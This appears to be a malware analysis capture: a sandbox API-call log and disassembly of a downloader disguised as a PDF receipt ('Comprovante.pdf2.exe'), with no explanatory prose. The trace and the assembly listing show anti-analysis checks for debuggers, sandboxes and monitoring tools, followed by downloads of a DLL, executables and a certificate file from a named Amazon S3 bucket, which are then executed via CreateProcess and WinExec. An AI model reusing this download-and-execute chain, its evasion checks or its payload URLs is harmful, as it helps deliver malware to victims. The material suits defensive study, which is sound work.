Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(cryptdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iphlpapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(Sens) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(sensapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetOpen() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetConnect(s3-sa-east-1.amazonaws.com) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(hnetcfg.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
bind(port=0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:2673 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(imagehlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\wintrust.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(crypt32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZoneAttributeCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\ZonesLockedCacheCounterMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpSendRequest() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasadhlp.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
connect( 127.0.0.1:9666 ) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/Projeto.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateProcess((null),C:\wina\Projeto.exe,(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsobs.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/jsob.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
HttpOpenRequest(/banolo99/trusted.certs) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ExitProcess(0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(RegWatcher.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(arwwdwin.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(XueTr.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]

CODE:0045404B                 push    0
CODE:0045404D                 push    0
CODE:0045404F                 push    offset aCWinaJjca_dll ; "C:\\wina\\jjca.dll"
CODE:00454054                 push    offset aHttpsS3SaEast1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:00454059                 push    0
CODE:0045405B                 call    URLDownloadToFileA
CODE:00454060                 push    0
CODE:00454062                 push    0
CODE:00454064                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:00454069                 push    offset aHttpsS3SaEas_0 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045406E                 push    0
CODE:00454070                 call    URLDownloadToFileA
CODE:00454075                 push    5
CODE:00454077                 push    offset aCWinaProjeto_e ; "C:\\wina\\Projeto.exe"
CODE:0045407C                 call    WinExec
CODE:00454081                 push    0
CODE:00454083                 push    0
CODE:00454085                 push    offset aCWinaJsobs_exe ; "C:\\wina\\jsobs.exe"
CODE:0045408A                 push    offset aHttpsS3SaEas_1 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:0045408F                 push    0
CODE:00454091                 call    URLDownloadToFileA
CODE:00454096                 push    0
CODE:00454098                 push    0
CODE:0045409A                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:0045409F                 push    offset aHttpsS3SaEas_2 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540A4                 push    0
CODE:004540A6                 call    URLDownloadToFileA
CODE:004540AB                 push    5
CODE:004540AD                 push    offset aCWinaJsob_exe ; "C:\\wina\\jsob.exe"
CODE:004540B2                 call    WinExec
CODE:004540B7                 push    0
CODE:004540B9                 push    0
CODE:004540BB                 lea     edx, [ebp-4]
CODE:004540BE                 mov     eax, offset _str_LOCALAPPDATA.Text
CODE:004540C3                 call    @Sysutils@GetEnvironmentVariable$qqrx17System@AnsiString ; Sysutils::GetEnvironmentVariable(System::AnsiString)
CODE:004540C8                 lea     eax, [ebp-4]
CODE:004540CB                 mov     edx, offset _str_Low_Sun_Java_De.Text
CODE:004540D0                 call    @System@@LStrCat$qqrv ; System::__linkproc__ LStrCat(void)
CODE:004540D5                 mov     eax, [ebp-4]
CODE:004540D8                 call    @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004540DD                 push    eax
CODE:004540DE                 push    offset aHttpsS3SaEas_3 ; "https://s3-sa-east-1.amazonaws.com/bano"...
CODE:004540E3                 push    0
CODE:004540E5                 call    URLDownloadToFileA
CODE:004540EA                 mov     eax, ds:off_456734
CODE:004540EF                 mov     eax, [eax]
CODE:004540F1                 call    @Forms@TApplication@Terminate$qqrv ; Forms::TApplication::Terminate(void)
CODE:004540F6                 xor     eax, eax
CODE:004540F8                 pop     edx
CODE:004540F9                 pop     ecx
CODE:004540FA                 pop     ecx
CODE:004540FB                 mov     fs:[eax], edx
CODE:004540FE                 jmp     short loc_45410A

Code:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(msimg32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(winspool.drv) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
